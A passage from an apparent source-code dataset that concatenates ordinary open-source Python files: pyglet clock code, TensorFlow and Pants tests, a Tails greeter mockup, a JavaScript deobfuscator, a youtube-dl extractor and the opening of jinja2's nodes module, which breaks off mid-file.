:see: `Clock.schedule_interval_soft`
:since: pyglet 1.1
:Parameters:
`func` : function
The function to call when the timer lapses.
`interval` : float
The number of seconds to wait between each call.
'''
_default.schedule_interval_soft(func, interval, *args, **kwargs)
def schedule_once(func, delay, *args, **kwargs):
'''Schedule 'func' to be called once after 'delay' seconds (can be
a float) on the default clock. The arguments passed to 'func' are
'dt' (time since last function call), followed by any ``*args`` and
``**kwargs`` given here.
If no default clock is set, the func is queued and will be scheduled
on the default clock as soon as it is created.
:Parameters:
`func` : function
The function to call when the timer lapses.
`delay` : float
The number of seconds to wait before the timer lapses.
'''
_default.schedule_once(func, delay, *args, **kwargs)
def unschedule(func):
'''Remove 'func' from the default clock's schedule. No error
is raised if the func was never scheduled.
:Parameters:
`func` : function
The function to remove from the schedule.
'''
_default.unschedule(func)
class ClockDisplay(object):
'''Display current clock values, such as FPS.
This is a convenience class for displaying diagnostics such as the
framerate. See the module documentation for example usage.
:Ivariables:
`label` : `pyglet.font.Text`
The label which is displayed.
:deprecated: This class presents values that are often misleading, as
they reflect the rate of clock ticks, not displayed framerate. Use
pyglet.window.FPSDisplay instead.
'''
def __init__(self,
font=None,
interval=0.25,
format='%(fps).2f',
color=(.5, .5, .5, .5),
clock=None):
'''Create a ClockDisplay.
All parameters are optional. By default, a large translucent
font will be used to display the FPS to two decimal places.
:Parameters:
`font` : `pyglet.font.Font`
The font to format text in.
`interval` : float
The number of seconds between updating the display.
`format` : str
A format string describing the format of the text. This
string is modulated with the dict ``{'fps' : fps}``.
`color` : 4-tuple of float
The color, including alpha, passed to ``glColor4f``.
`clock` : `Clock`
The clock which determines the time. If None, the default
clock is used.
'''
if clock is None:
clock = _default
self.clock = clock
self.clock.schedule_interval(self.update_text, interval)
if not font:
from pyglet.font import load as load_font
font = load_font('', 36, bold=True)
import pyglet.font
self.label = pyglet.font.Text(font, '', color=color, x=10, y=10)
self.format = format
def unschedule(self):
'''Remove the display from its clock's schedule.
`ClockDisplay` uses `Clock.schedule_interval` to periodically update
its display label. Even if the ClockDisplay is not being used any
more, its update method will still be scheduled, which can be a
resource drain. Call this method to unschedule the update method
and allow the ClockDisplay to be garbage collected.
:since: pyglet 1.1
'''
self.clock.unschedule(self.update_text)
def update_text(self, dt=0):
'''Scheduled method to update the label text.'''
fps = self.clock.get_fps()
self.label.text = self.format % {'fps': fps}
def draw(self):
'''Method called each frame to render the label.'''
self.label.draw()
def test_clock():
import getopt
import sys
test_seconds = 1
test_fps = 60
show_fps = False
options, args = getopt.getopt(sys.argv[1:], 'vht:f:',
['time=', 'fps=', 'help'])
for key, value in options:
if key in ('-t', '--time'):
test_seconds = float(value)
elif key in ('-f', '--fps'):
test_fps = float(value)
elif key in ('-v'):
show_fps = True
elif key in ('-h', '--help'):
print ('Usage: clock.py <options>\n'
'\n'
'Options:\n'
' -t --time Number of seconds to run for.\n'
' -f --fps Target FPS.\n'
'\n'
'Tests the clock module by measuring how close we can\n'
'get to the desired FPS by sleeping and busy-waiting.')
sys.exit(0)
set_fps_limit(test_fps)
start = time.time()
# Add one because first frame has no update interval.
n_frames = int(test_seconds * test_fps + 1)
print 'Testing %f FPS for %f seconds...' % (test_fps, test_seconds)
for i in xrange(n_frames):
tick()
if show_fps:
print get_fps()
total_time = time.time() - start
total_error = total_time - test_seconds
print 'Total clock error: %f secs' % total_error
print 'Total clock error / secs: %f secs/secs' % \
(total_error / test_seconds)
# Not fair to add the extra frame in this calc, since no-one's interested
# in the startup situation.
print 'Average FPS: %f' % ((n_frames - 1) / total_time)
if __name__ == '__main__':
test_clock()
| bsd-3-clause |
maciekcc/tensorflow | tensorflow/contrib/learn/python/learn/estimators/estimators_test.py | 23 | 5276 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Custom optimizer tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import numpy as np
from tensorflow.contrib.framework.python.ops import variables
from tensorflow.contrib.learn.python import learn
from tensorflow.contrib.learn.python.learn import datasets
from tensorflow.contrib.learn.python.learn import metric_spec
from tensorflow.contrib.learn.python.learn.estimators import estimator as estimator_lib
from tensorflow.contrib.learn.python.learn.estimators._sklearn import accuracy_score
from tensorflow.contrib.learn.python.learn.estimators._sklearn import train_test_split
from tensorflow.python.framework import constant_op
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
from tensorflow.python.training import momentum as momentum_lib
class FeatureEngineeringFunctionTest(test.TestCase):
"""Tests feature_engineering_fn."""
def testFeatureEngineeringFn(self):
def input_fn():
return {
"x": constant_op.constant([1.])
}, {
"y": constant_op.constant([11.])
}
def feature_engineering_fn(features, labels):
_, _ = features, labels
return {
"transformed_x": constant_op.constant([9.])
}, {
"transformed_y": constant_op.constant([99.])
}
def model_fn(features, labels):
# dummy variable:
_ = variables_lib.Variable([0.])
_ = labels
predictions = features["transformed_x"]
loss = constant_op.constant([2.])
update_global_step = variables.get_global_step().assign_add(1)
return predictions, loss, update_global_step
estimator = estimator_lib.Estimator(
model_fn=model_fn, feature_engineering_fn=feature_engineering_fn)
estimator.fit(input_fn=input_fn, steps=1)
prediction = next(estimator.predict(input_fn=input_fn, as_iterable=True))
# predictions = transformed_x (9)
self.assertEqual(9., prediction)
metrics = estimator.evaluate(
input_fn=input_fn, steps=1,
metrics={"label":
metric_spec.MetricSpec(lambda predictions, labels: labels)})
# labels = transformed_y (99)
self.assertEqual(99., metrics["label"])
def testNoneFeatureEngineeringFn(self):
def input_fn():
return {
"x": constant_op.constant([1.])
}, {
"y": constant_op.constant([11.])
}
def feature_engineering_fn(features, labels):
_, _ = features, labels
return {
"x": constant_op.constant([9.])
}, {
"y": constant_op.constant([99.])
}
def model_fn(features, labels):
# dummy variable:
_ = variables_lib.Variable([0.])
_ = labels
predictions = features["x"]
loss = constant_op.constant([2.])
update_global_step = variables.get_global_step().assign_add(1)
return predictions, loss, update_global_step
estimator_with_fe_fn = estimator_lib.Estimator(
model_fn=model_fn, feature_engineering_fn=feature_engineering_fn)
estimator_with_fe_fn.fit(input_fn=input_fn, steps=1)
estimator_without_fe_fn = estimator_lib.Estimator(model_fn=model_fn)
estimator_without_fe_fn.fit(input_fn=input_fn, steps=1)
# predictions = x
prediction_with_fe_fn = next(
estimator_with_fe_fn.predict(
input_fn=input_fn, as_iterable=True))
self.assertEqual(9., prediction_with_fe_fn)
prediction_without_fe_fn = next(
estimator_without_fe_fn.predict(
input_fn=input_fn, as_iterable=True))
self.assertEqual(1., prediction_without_fe_fn)
class CustomOptimizer(test.TestCase):
"""Custom optimizer tests."""
def testIrisMomentum(self):
random.seed(42)
iris = datasets.load_iris()
x_train, x_test, y_train, y_test = train_test_split(
iris.data, iris.target, test_size=0.2, random_state=42)
def custom_optimizer():
return momentum_lib.MomentumOptimizer(learning_rate=0.01, momentum=0.9)
classifier = learn.DNNClassifier(
hidden_units=[10, 20, 10],
feature_columns=learn.infer_real_valued_columns_from_input(x_train),
n_classes=3,
optimizer=custom_optimizer,
config=learn.RunConfig(tf_random_seed=1))
classifier.fit(x_train, y_train, steps=400)
predictions = np.array(list(classifier.predict_classes(x_test)))
score = accuracy_score(y_test, predictions)
self.assertGreater(score, 0.65, "Failed with score = {0}".format(score))
if __name__ == "__main__":
test.main()
| apache-2.0 |
austin987/tails | wiki/src/blueprint/greeter_revamp_UI/mockups/mockup.py | 14 | 7062 | #!/usr/bin/python
#*-* coding=utf-8
import sys
import optparse
from gi.repository import Gtk, Gdk, GObject, GdkPixbuf
class GreeterMockup:
def __init__(self, version="5", persistence=False):
uifilename = "tails-greeter" + version + ".ui"
ui = Gtk.Builder()
ui.add_from_file(uifilename)
ui.connect_signals(self)
self._main_window = ui.get_object("window_main")
self._notebook = ui.get_object("notebook_main")
self._previous = ui.get_object("button_previous")
self._locale_label = ui.get_object("label_locale")
self._linkbutton_language = ui.get_object("linkbutton_language")
self._persistence = ui.get_object("box_persistence")
self._persistence_setup = ui.get_object("button_persistence_setup")
self._persistence_entry = ui.get_object("box_persistence_entry")
self._persistence_activate = ui.get_object("box_persistence_activate")
self._persistence_info = ui.get_object("box_persistence_info")
self._iconview_locale = ui.get_object("iconview_locale")
self._iconview_options = ui.get_object("iconview_options")
language = ui.get_object("languages_treeview")
self._persistence.set_visible(persistence)
if language:
tvcolumn = Gtk.TreeViewColumn("Language")
language.append_column(tvcolumn)
cell = Gtk.CellRendererText()
tvcolumn.pack_start(cell, True)
tvcolumn.add_attribute(cell, 'text', 1)
self.cb_languages()
self._iconview_locale.connect("selection-changed", self.cb_option_selected)
self.fill_view(self._iconview_options,
[("Keyboard", "preferences-desktop-keyboard", "cb_show_keyboard"),
("Bridges", "network-vpn", "cb_show_briges"),
("Widows camouflage", "preferences-desktop-theme", "cb_show_camouflage"),
("Administrative rights", "dialog-password", "cb_show_password"),
("Hardware address", "audio-card", "cb_show_mac")])
self._iconview_options.connect("selection-changed", self.cb_option_selected)
self._main_window.show()
def fill_view(self, view, list):
model = Gtk.ListStore(GObject.TYPE_STRING, GdkPixbuf.Pixbuf, GObject.TYPE_STRING)
icon_theme = Gtk.IconTheme.get_default()
for i in list:
try:
pixbuf = icon_theme.lookup_icon(i[1], 48, 0).load_icon()
except:
pixbuf = None
model.append([i[0], pixbuf, i[2]])
view.set_model(model)
view.set_text_column(0)
view.set_pixbuf_column(1)
def cb_languages(self, widget=None, data=None):
self.fill_view(self._iconview_locale,
[("Deutsch", None, "cb_locale"),
("English", None, "cb_locale"),
("Español", None, "cb_locale"),
("Français", None, "cb_locale"),
("Italiano", None, "cb_locale"),
("Portugès", None, "cb_locale"),
("Tiéng Vièt", None, "cb_locale"),
("Русский", None, "cb_locale"),
("العربية", None, "cb_locale"),
("فارسی", None, "cb_locale"),
("中文", None, "cb_locale"),
("Other...", None, "cb_more_languages")])
self._locale_label.set_text("please select your language")
if self._linkbutton_language:
self._linkbutton_language.set_visible(False)
def cb_option_selected(self, iconview, data=None):
treepath = iconview.get_selected_items()[0]
model = iconview.get_model()
method_name = model[treepath][2]
if method_name:
method_name = "self." + method_name +"()"
print(method_name)
exec(method_name)
def cb_more_languages(self):
self._notebook.set_current_page(1)
self._previous.set_visible(True)
def cb_locale(self):
self.fill_view(self._iconview_locale,
[("Belgique", None, "cb_keyboard"),
("Canada", None, "cb_keyboard"),
("France", None, "cb_keyboard"),
("Luxembouge", None, "cb_keyboard"),
("Suisse", None, "cb_keyboard"),
("Other...", None, "cb_more_languages")])
self._locale_label.set_text("you have chosen French language; please select your region")
if self._linkbutton_language:
self._linkbutton_language.set_visible(True)
def cb_keyboard(self):
pass
def cb_show_briges(self):
pass
def cb_show_keyboard(self):
self._notebook.set_current_page(1)
self._previous.set_visible(True)
def cb_show_locale(self):
self._notebook.set_current_page(1)
self._previous.set_visible(True)
def cb_show_main(self, widget, data=None):
self._notebook.set_current_page(0)
self._previous.set_visible(False)
def cb_show_camouflage(self):
self._notebook.set_current_page(3)
self._previous.set_visible(True)
def cb_show_password(self):
self._notebook.set_current_page(2)
self._previous.set_visible(True)
def cb_show_mac(self):
self._notebook.set_current_page(3)
self._previous.set_visible(True)
def cb_setup_persistence(self, widget, data=None):
if self._persistence_setup:
self._persistence_setup.set_visible(False)
self._persistence_entry.set_visible(True)
self._persistence_activate.set_visible(True)
def cb_activate_persistence(self, widget, data=None):
if self._persistence_activate:
self._persistence_entry.set_visible(False)
self._persistence_activate.set_visible(False)
self._persistence_info.set_visible(True)
def cb_cancel_persistence(self, widget, data=None):
if self._persistence_setup:
self._persistence_entry.set_visible(False)
self._persistence_activate.set_visible(False)
self._persistence_setup.set_visible(True)
def cb_quit(self, widget, data=None):
Gtk.main_quit()
def cb_lang_button_press(self, widget, event, data=None):
"""Handle mouse click in langdialog"""
if (event.type == Gdk.EventType._2BUTTON_PRESS or
event.type == Gdk.EventType._3BUTTON_PRESS):
self._notebook.set_current_page(0)
self._previous.set_visible(False)
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option("-v", "--variant", dest="variant", default="5")
parser.add_option("-p", "--persistence", action="store_true", dest="persistence", default=False)
parser.add_option("-P", "--no-persistence", action="store_false", dest="persistence", default=False)
(options, args) = parser.parse_args()
app = GreeterMockup(options.variant, options.persistence)
Gtk.main()
| gpl-3.0 |
repotvsupertuga/tvsupertuga.repository | script.premium.TVsupertuga/resources/lib/external/jsbeautifier/unpackers/javascriptobfuscator.py | 220 | 1790 | #
# simple unpacker/deobfuscator for scripts messed up with
# javascriptobfuscator.com
#
# written by Einar Lielmanis <[email protected]>
# rewritten in Python by Stefano Sanfilippo <[email protected]>
#
# Will always return valid javascript: if `detect()` is false, `code` is
# returned, unmodified.
#
# usage:
#
# if javascriptobfuscator.detect(some_string):
# some_string = javascriptobfuscator.unpack(some_string)
#
"""deobfuscator for scripts messed up with JavascriptObfuscator.com"""
import re
PRIORITY = 1
def smartsplit(code):
"""Split `code` at " symbol, only if it is not escaped."""
strings = []
pos = 0
while pos < len(code):
if code[pos] == '"':
word = '' # new word
pos += 1
while pos < len(code):
if code[pos] == '"':
break
if code[pos] == '\\':
word += '\\'
pos += 1
word += code[pos]
pos += 1
strings.append('"%s"' % word)
pos += 1
return strings
def detect(code):
"""Detects if `code` is JavascriptObfuscator.com packed."""
# prefer `is not` idiom, so that a true boolean is returned
return (re.search(r'^var _0x[a-f0-9]+ ?\= ?\[', code) is not None)
def unpack(code):
"""Unpacks JavascriptObfuscator.com packed code."""
if detect(code):
matches = re.search(r'var (_0x[a-f\d]+) ?\= ?\[(.*?)\];', code)
if matches:
variable = matches.group(1)
dictionary = smartsplit(matches.group(2))
code = code[len(matches.group(0)):]
for key, value in enumerate(dictionary):
code = code.replace(r'%s[%s]' % (variable, key), value)
return code
| gpl-2.0 |
atomic83/youtube-dl | youtube_dl/extractor/worldstarhiphop.py | 114 | 2323 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
class WorldStarHipHopIE(InfoExtractor):
_VALID_URL = r'https?://(?:www|m)\.worldstar(?:candy|hiphop)\.com/(?:videos|android)/video\.php\?v=(?P<id>.*)'
_TESTS = [{
"url": "http://www.worldstarhiphop.com/videos/video.php?v=wshh6a7q1ny0G34ZwuIO",
"md5": "9d04de741161603bf7071bbf4e883186",
"info_dict": {
"id": "wshh6a7q1ny0G34ZwuIO",
"ext": "mp4",
"title": "KO Of The Week: MMA Fighter Gets Knocked Out By Swift Head Kick!"
}
}, {
'url': 'http://m.worldstarhiphop.com/android/video.php?v=wshh6a7q1ny0G34ZwuIO',
'md5': 'dc1c76c83ecc4190bb1eb143899b87d3',
'info_dict': {
'id': 'wshh6a7q1ny0G34ZwuIO',
'ext': 'mp4',
"title": "KO Of The Week: MMA Fighter Gets Knocked Out By Swift Head Kick!"
}
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
m_vevo_id = re.search(r'videoId=(.*?)&?', webpage)
if m_vevo_id is not None:
return self.url_result('vevo:%s' % m_vevo_id.group(1), ie='Vevo')
video_url = self._search_regex(
[r'so\.addVariable\("file","(.*?)"\)',
r'<div class="artlist">\s*<a[^>]+href="([^"]+)">'],
webpage, 'video URL')
if 'youtube' in video_url:
return self.url_result(video_url, ie='Youtube')
video_title = self._html_search_regex(
[r'(?s)<div class="content-heading">\s*<h1>(.*?)</h1>',
r'<span[^>]+class="tc-sp-pinned-title">(.*)</span>'],
webpage, 'title')
# Getting thumbnail and if not thumbnail sets correct title for WSHH candy video.
thumbnail = self._html_search_regex(
r'rel="image_src" href="(.*)" />', webpage, 'thumbnail',
default=None)
if not thumbnail:
_title = r'candytitles.*>(.*)</span>'
mobj = re.search(_title, webpage)
if mobj is not None:
video_title = mobj.group(1)
return {
'id': video_id,
'url': video_url,
'title': video_title,
'thumbnail': thumbnail,
}
| unlicense |
kwlzn/pants | tests/python/pants_test/option/test_arg_splitter.py | 19 | 11254 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import shlex
import unittest
from pants.option.arg_splitter import (ArgSplitter, NoGoalHelp, OptionsHelp, UnknownGoalHelp,
VersionHelp)
from pants.option.scope import ScopeInfo
def task(scope):
return ScopeInfo(scope, ScopeInfo.TASK)
def intermediate(scope):
return ScopeInfo(scope, ScopeInfo.INTERMEDIATE)
def subsys(scope):
return ScopeInfo(scope, ScopeInfo.SUBSYSTEM)
class ArgSplitterTest(unittest.TestCase):
_known_scope_infos = [intermediate('compile'), task('compile.java'), task('compile.scala'),
subsys('jvm'), subsys('jvm.test.junit'),
subsys('reporting'), intermediate('test'), task('test.junit')]
def _split(self, args_str, expected_goals, expected_scope_to_flags, expected_target_specs,
expected_passthru=None, expected_passthru_owner=None,
expected_is_help=False, expected_help_advanced=False, expected_help_all=False):
expected_passthru = expected_passthru or []
splitter = ArgSplitter(ArgSplitterTest._known_scope_infos)
args = shlex.split(args_str)
goals, scope_to_flags, target_specs, passthru, passthru_owner = splitter.split_args(args)
self.assertEquals(expected_goals, goals)
self.assertEquals(expected_scope_to_flags, scope_to_flags)
self.assertEquals(expected_target_specs, target_specs)
self.assertEquals(expected_passthru, passthru)
self.assertEquals(expected_passthru_owner, passthru_owner)
self.assertEquals(expected_is_help, splitter.help_request is not None)
self.assertEquals(expected_help_advanced,
(isinstance(splitter.help_request, OptionsHelp) and
splitter.help_request.advanced))
self.assertEquals(expected_help_all,
(isinstance(splitter.help_request, OptionsHelp) and
splitter.help_request.all_scopes))
def _split_help(self, args_str, expected_goals, expected_scope_to_flags, expected_target_specs,
expected_help_advanced=False, expected_help_all=False):
self._split(args_str, expected_goals, expected_scope_to_flags, expected_target_specs,
expected_passthru=None, expected_passthru_owner=None,
expected_is_help=True,
expected_help_advanced=expected_help_advanced,
expected_help_all=expected_help_all)
def _split_version_request(self, args_str):
splitter = ArgSplitter(ArgSplitterTest._known_scope_infos)
splitter.split_args(shlex.split(args_str))
self.assertTrue(isinstance(splitter.help_request, VersionHelp))
def _split_unknown_goal(self, args_str, unknown_goals):
splitter = ArgSplitter(ArgSplitterTest._known_scope_infos)
splitter.split_args(shlex.split(args_str))
self.assertTrue(isinstance(splitter.help_request, UnknownGoalHelp))
self.assertSetEqual(set(unknown_goals), set(splitter.help_request.unknown_goals))
def _split_no_goal(self, args_str):
splitter = ArgSplitter(ArgSplitterTest._known_scope_infos)
splitter.split_args(shlex.split(args_str))
self.assertTrue(isinstance(splitter.help_request, NoGoalHelp))
def test_basic_arg_splitting(self):
# Various flag combos.
self._split('./pants --compile-java-long-flag -f compile -g compile.java -x test.junit -i '
'src/java/org/pantsbuild/foo src/java/org/pantsbuild/bar:baz',
['compile', 'test'],
{
'': ['-f'],
'compile.java': ['--long-flag', '-x'],
'compile': ['-g'],
'test.junit': ['-i']
},
['src/java/org/pantsbuild/foo', 'src/java/org/pantsbuild/bar:baz'])
self._split('./pants -farg --fff=arg compile --gg-gg=arg-arg -g test.junit --iii '
'--compile-java-long-flag src/java/org/pantsbuild/foo src/java/org/pantsbuild/bar:baz',
['compile', 'test'],
{
'': ['-farg', '--fff=arg'],
'compile': ['--gg-gg=arg-arg', '-g'],
'test.junit': ['--iii'],
'compile.java': ['--long-flag'],
},
['src/java/org/pantsbuild/foo', 'src/java/org/pantsbuild/bar:baz'])
def test_distinguish_goals_from_target_specs(self):
self._split('./pants compile test foo::', ['compile', 'test'],
{'': [], 'compile': [], 'test': []}, ['foo::'])
self._split('./pants compile test foo::', ['compile', 'test'],
{'': [], 'compile': [], 'test': []}, ['foo::'])
self._split('./pants compile test:test', ['compile'], {'': [], 'compile': []}, ['test:test'])
self._split('./pants test test:test', ['test'], {'': [], 'test': []}, ['test:test'])
self._split('./pants test ./test', ['test'], {'': [], 'test': []}, ['./test'])
self._split('./pants test //test', ['test'], {'': [], 'test': []}, ['//test'])
def test_descoping_qualified_flags(self):
self._split('./pants compile test --compile-java-bar --no-test-junit-baz foo/bar',
['compile', 'test'],
{'': [], 'compile': [], 'compile.java': ['--bar'], 'test': [],
'test.junit': ['--no-baz']}, ['foo/bar'])
# Qualified flags don't count as explicit goals.
self._split('./pants compile --test-junit-bar foo/bar',
['compile'],
{'': [], 'compile': [], 'test.junit': ['--bar']}, ['foo/bar'])
def test_passthru_args(self):
self._split('./pants test foo/bar -- -t arg',
['test'],
{'': [], 'test': []},
['foo/bar'],
expected_passthru=['-t', 'arg'],
expected_passthru_owner='test')
self._split('./pants -farg --fff=arg compile --gg-gg=arg-arg -g test.junit --iii '
'--compile-java-long-flag src/java/org/pantsbuild/foo '
'src/java/org/pantsbuild/bar:baz '
'-- passthru1 passthru2',
['compile', 'test'],
{
'': ['-farg', '--fff=arg'],
'compile': ['--gg-gg=arg-arg', '-g'],
'compile.java': ['--long-flag'],
'test.junit': ['--iii']
},
['src/java/org/pantsbuild/foo', 'src/java/org/pantsbuild/bar:baz'],
expected_passthru=['passthru1', 'passthru2'],
expected_passthru_owner='test.junit')
def test_subsystem_flags(self):
# Global subsystem flag in global scope.
self._split('./pants --jvm-options=-Dbar=baz test foo:bar',
['test'],
{'': [], 'jvm': ['--options=-Dbar=baz'], 'test': []}, ['foo:bar'])
# Qualified task subsystem flag in global scope.
self._split('./pants --jvm-test-junit-options=-Dbar=baz test foo:bar',
['test'],
{'': [], 'jvm.test.junit': ['--options=-Dbar=baz'], 'test': []}, ['foo:bar'])
# Unqualified task subsystem flag in task scope.
# Note that this exposes a small problem: You can't set an option on the cmd-line if that
# option's name begins with any subsystem scope. For example, if test.junit has some option
# named --jvm-foo, then it cannot be set on the cmd-line, because the ArgSplitter will assume
# it's an option --foo on the jvm subsystem.
self._split('./pants test.junit --jvm-options=-Dbar=baz foo:bar',
['test'],
{'': [], 'jvm.test.junit': ['--options=-Dbar=baz'], 'test.junit': []}, ['foo:bar'])
# Global-only flag in task scope.
self._split('./pants test.junit --reporting-template-dir=path foo:bar',
['test'],
{'': [], 'reporting': ['--template-dir=path'], 'test.junit': []}, ['foo:bar'])
def test_help_detection(self):
self._split_help('./pants', [], {'': []}, [])
self._split_help('./pants goal', [], {'': []}, [])
self._split_help('./pants -f', [], {'': ['-f']}, [])
self._split_help('./pants goal -f', [], {'': ['-f']}, [])
self._split_help('./pants help', [], {'': []}, [])
self._split_help('./pants goal help', [], {'': []}, [])
self._split_help('./pants -h', [], {'': []}, [])
self._split_help('./pants goal -h', [], {'': []}, [])
self._split_help('./pants --help', [], {'': []}, [])
self._split_help('./pants goal --help', [], {'': []}, [])
self._split_help('./pants help compile -x', ['compile'],
{'': [], 'compile': ['-x']}, [])
self._split_help('./pants help compile -x', ['compile'],
{'': [], 'compile': ['-x']}, [])
self._split_help('./pants compile -h', ['compile'],
{'': [], 'compile': []}, [])
self._split_help('./pants compile --help test', ['compile', 'test'],
{'': [], 'compile': [], 'test': []}, [])
self._split_help('./pants test src/foo/bar:baz -h', ['test'],
{'': [], 'test': []}, ['src/foo/bar:baz'])
self._split_help('./pants help-advanced', [], {'': []}, [], True, False)
self._split_help('./pants help-all', [], {'': []}, [], False, True)
self._split_help('./pants --help-advanced', [], {'': []}, [], True, False)
self._split_help('./pants --help-all', [], {'': []}, [], False, True)
self._split_help('./pants --help --help-advanced', [], {'': []}, [], True, False)
self._split_help('./pants --help-advanced --help', [], {'': []}, [], True, False)
self._split_help('./pants --help --help-all', [], {'': []}, [], False, True)
self._split_help('./pants --help-all --help --help-advanced', [], {'': []}, [], True, True)
self._split_help('./pants help --help-advanced', [], {'': []}, [], True, False)
self._split_help('./pants help-advanced --help-all', [], {'': []}, [], True, True)
self._split_help('./pants compile --help-advanced test', ['compile', 'test'],
{'': [], 'compile': [], 'test': []}, [], True, False)
self._split_help('./pants help-advanced compile', ['compile'],
{'': [], 'compile': []}, [], True, False)
self._split_help('./pants compile help-all test --help', ['compile', 'test'],
{'': [], 'compile': [], 'test': []}, [], False, True)
def test_version_request_detection(self):
self._split_version_request('./pants -v')
self._split_version_request('./pants -V')
self._split_version_request('./pants --version')
# A version request supercedes anything else.
self._split_version_request('./pants --version compile --foo --bar path/to/target')
def test_unknown_goal_detection(self):
self._split_unknown_goal('./pants foo', ['foo'])
self._split_unknown_goal('./pants compile foo', ['foo'])
self._split_unknown_goal('./pants foo bar baz:qux', ['foo', 'bar'])
self._split_unknown_goal('./pants foo compile bar baz:qux', ['foo', 'bar'])
def test_no_goal_detection(self):
self._split_no_goal('./pants foo/bar:baz')
| apache-2.0 |
MadeiraCloud/opsagent | libs/jinja2/nodes.py | 623 | 28875 | # -*- coding: utf-8 -*-
"""
jinja2.nodes
~~~~~~~~~~~~
This module implements additional nodes derived from the ast base node.
It also provides some node tree helper functions like `in_lineno` and
`get_nodes` used by the parser and translator in order to normalize
python and jinja nodes.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import operator
from collections import deque
from jinja2.utils import Markup
from jinja2._compat import next, izip, with_metaclass, text_type, \
method_type, function_type
#: the types we support for context functions
_context_function_types = (function_type, method_type)
_binop_to_func = {
'*': operator.mul,
'/': operator.truediv,
'//': operator.floordiv,
'**': operator.pow,
'%': operator.mod,
'+': operator.add,
'-': operator.sub
}
_uaop_to_func = {
'not': operator.not_,
'+': operator.pos,
'-': operator.neg
}
_cmpop_to_func = {
'eq': operator.eq,
'ne': operator.ne,
'gt': operator.gt,
'gteq': operator.ge,
'lt': operator.lt,
'lteq': operator.le,
'in': lambda a, b: a in b,
'notin': lambda a, b: a not in b
}
class Impossible(Exception):
"""Raised if the node could not perform a requested action."""
class NodeType(type):
"""A metaclass for nodes that handles the field and attribute
inheritance. fields and attributes from the parent class are
automatically forwarded to the child."""
def __new__(cls, name, bases, d):
for attr in 'fields', 'attributes':
storage = []
storage.extend(getattr(bases[0], attr, ()))
storage.extend(d.get(attr, ()))
assert len(bases) == 1, 'multiple inheritance not allowed'
assert len(storage) == len(set(storage)), 'layout conflict'
d[attr] = tuple(storage)
d.setdefault('abstract', False)
return type.__new__(cls, name, bases, d)
class EvalContext(object):
"""Holds evaluation time information. Custom attributes can be attached
to it in extensions.
"""
def __init__(self, environment, template_name=None):
self.environment = environment
if callable(environment.autoescape):
self.autoescape = environment.autoescape(template_name)
else:
self.autoescape = environment.autoescape
self.volatile = False
def save(self):
return self.__dict__.copy()
def revert(self, old):
self.__dict__.clear()
self.__dict__.update(old)
def get_eval_context(node, ctx):
if ctx is None:
if node.environment is None:
raise RuntimeError('if no eval context is passed, the '
'node must have an attached '
'environment.')
return EvalContext(node.environment)
return ctx
class Node(with_metaclass(NodeType, object)):
"""Baseclass for all Jinja2 nodes. There are a number of nodes available
of different types. There are four major types:
- :class:`Stmt`: statements
- :class:`Expr`: expressions
- :class:`Helper`: helper nodes
- :class:`Template`: the outermost wrapper node
All nodes have fields and attributes. Fields may be other nodes, lists,
or arbitrary values. Fields are passed to the constructor as regular
positional arguments, attributes as keyword arguments. Each node has
two attributes: `lineno` (the line number of the node) and `environment`.
The `environment` attribute is set at the end of the parsing process for
all nodes automatically.
"""
fields = ()
attributes = ('lineno', 'environment')
abstract = True
def __init__(self, *fields, **attributes):
if self.abstract:
raise TypeError('abstract nodes are not instanciable')
if fields:
if len(fields) != len(self.fields):
if not self.fields:
raise TypeError('%r takes 0 arguments' %
self.__class__.__name__)
raise TypeError('%r takes 0 or %d argument%s' % (
self.__class__.__name__,
len(self.fields),
len(self.fields) != 1 and 's' or ''
))
for name, arg in izip(self.fields, fields):
setattr(self, name, arg)
for attr in self.attributes:
setattr(self, attr, attributes.pop(attr, None))
if attributes:
raise TypeError('unknown attribute %r' %
next(iter(attributes)))
def iter_fields(self, exclude=None, only=None):
"""This method iterates over all fields that are defined and yields
``(key, value)`` tuples. Per default all fields are returned, but
it's possible to limit that to some fields by providing the `only`
parameter or to exclude some using the `exclude` parameter. Both
should be sets or tuples of field names.
"""
for name in self.fields:
if (exclude is only is None) or \
(exclude is not None and name not in exclude) or \
(only is not None and name in only):
try:
yield name, getattr(self, name)
except AttributeError:
pass
def iter_child_nodes(self, exclude=None, only=None):
"""Iterates over all direct child nodes of the node. This iterates
over all fields and yields the values of they are nodes. If the value
of a field is a list all the nodes in that list are returned.
"""
for field, item in self.iter_fields(exclude, only):
if isinstance(item, list):
for n in item:
if isinstance(n, Node):
yield n
elif isinstance(item, Node):
yield item
def find(self, node_type):
"""Find the first node of a given type. If no such node exists the
return value is `None`.
"""
for result in self.find_all(node_type):
return result
def find_all(self, node_type):
"""Find all the nodes of a given type. If the type is a tuple,
the check is performed for any of the tuple items.
"""
for child in self.iter_child_nodes():
if isinstance(child, node_type):
yield child
for result in child.find_all(node_type):
yield result
def set_ctx(self, ctx):
"""Reset the context of a node and all child nodes. Per default the
parser will all generate nodes that have a 'load' context as it's the
most common one. This method is used in the parser to set assignment
targets and other nodes to a store context.
"""
todo = deque([self])
while todo:
node = todo.popleft()
if 'ctx' in node.fields:
node.ctx = ctx
todo.extend(node.iter_child_nodes())
return self
def set_lineno(self, lineno, override=False):
"""Set the line numbers of the node and children."""
todo = deque([self])
while todo:
node = todo.popleft()
if 'lineno' in node.attributes:
if node.lineno is None or override:
node.lineno = lineno
todo.extend(node.iter_child_nodes())
return self
def set_environment(self, environment):
"""Set the environment for all nodes."""
todo = deque([self])
